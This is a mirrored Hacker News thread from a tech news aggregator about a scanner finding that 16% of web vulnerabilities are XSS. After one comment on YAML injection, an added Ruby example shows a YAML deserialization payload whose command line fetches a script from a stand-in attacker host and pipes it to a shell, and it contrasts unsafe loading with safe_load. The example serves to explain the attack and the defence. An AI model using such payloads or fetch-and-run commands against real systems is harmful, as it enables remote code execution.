科技回声

A tech news platform built on Next.js that mirrors global tech news and discussion content (Hacker News threads).

Resource links: HackerNews API, original Hacker News, Next.js

© 2025 科技回声. All rights reserved.

16% of web vulnerabilities are still XSS

19 points, by bensedat, almost 12 years ago

5 comments

tptacek, almost 12 years ago
I assume they're not tracking CSRF, since CSRF tends to be much more common than XSS.
Reply #5864650 not loaded
compumike, almost 12 years ago
Big variance in vulnerability seriousness across that spectrum... but if you've found 100K+ vulns and 2.5% are SQL injection, that's a lot of big holes!
Reply #5864646 not loaded
bluetooth, almost 12 years ago
How did you test for YAML injection? From my past experiences with Ruby (hardly any) YAML injection is difficult to test from a blackbox perspective as you need an understanding of the source code in order to be able to craft the appropriate serialized YAML object to yield code execution.
Reply #5865177 not loaded
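The point raised in the comment above, that a YAML injection payload has to name an application class whose loading has side effects, is easiest to see in a runnable form. The following is an added example, not code from the thread or from any scanner; the ReportJob class and the payload are constructed for illustration, and the class deliberately records rather than runs its command. It contrasts Ruby's permissive loader (YAML.load on Psych 3, YAML.unsafe_load on Psych 4 / Ruby 3.1+), which instantiates whatever class the !ruby/object tag names, with YAML.safe_load, which rejects tagged objects unless the class is whitelisted.

```ruby
require "yaml"

# Constructed stand-in for an application class that a YAML injection would
# target. A real gadget is a class whose instantiation or later use (e.g. a
# to_s or method_missing hook, or a method the app calls on the loaded
# object) runs attacker-controlled data. Here it only records the command.
class ReportJob
  attr_reader :command

  def run
    "would execute: #{@command}"
  end
end

# Constructed attacker payload. The tag names the class; the mapping
# populates its instance variables directly, so initialize is never called
# and any validation there is bypassed. Guessing "ReportJob" without source
# access is the blackbox difficulty the comment describes.
PAYLOAD = <<~YAML
  --- !ruby/object:ReportJob
  command: "curl http://attacker.example/x | sh"
YAML

# Permissive loader. Psych 4 (Ruby 3.1+) moved the old YAML.load behaviour
# to YAML.unsafe_load and made YAML.load safe by default; older Psych only
# has YAML.load, which is the unsafe one.
def unsafe_parse(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Restricted loader: only scalars, arrays and hashes, plus classes that are
# explicitly whitelisted via permitted_classes.
def safe_parse(doc, permitted: [])
  YAML.safe_load(doc, permitted_classes: permitted)
end

# Returns what each loader does with the same payload.
def demo
  obj = unsafe_parse(PAYLOAD)
  unsafe_result = [obj.class.name, obj.run]

  safe_result =
    begin
      safe_parse(PAYLOAD)
      "loaded"
    rescue Psych::DisallowedClass => e
      "rejected: #{e.message}"
    end

  { unsafe: unsafe_result, safe: safe_result }
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

The unsafe branch yields a live ReportJob carrying the attacker's string, which is the primitive every Ruby YAML gadget chain builds on; the safe branch raises Psych::DisallowedClass before any object exists. If an application genuinely needs to round-trip its own objects, whitelist them one by one with permitted_classes rather than reaching for unsafe_load.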
sebcat, almost 12 years ago
Title is wrong. Instead of saying that 16% of web vulns are XSS, it should say that 16% of the findings reported by this particular product/service are XSS.

Web vulnerability scanners can diff a lot in their results. Crawling algos/site coverage, finding and using different input vectors, specific testing methods &c are all very different across various products. Sectoolmarket is a good resource with results from WIVET (crawl tests more or less) and WAVSEP (detecting vulnerabilities). Even so, those benchmarks only cover a very small portion of possible web application attack vectors. And let's not forget the problem of crawling "The Deep Web" i.e., stateful web applications.

TL;DR: title is wrong.
sdevlin, almost 12 years ago
16% of web vulnerabilities *found by a scanner* are still XSS.
Reply #5865202 not loaded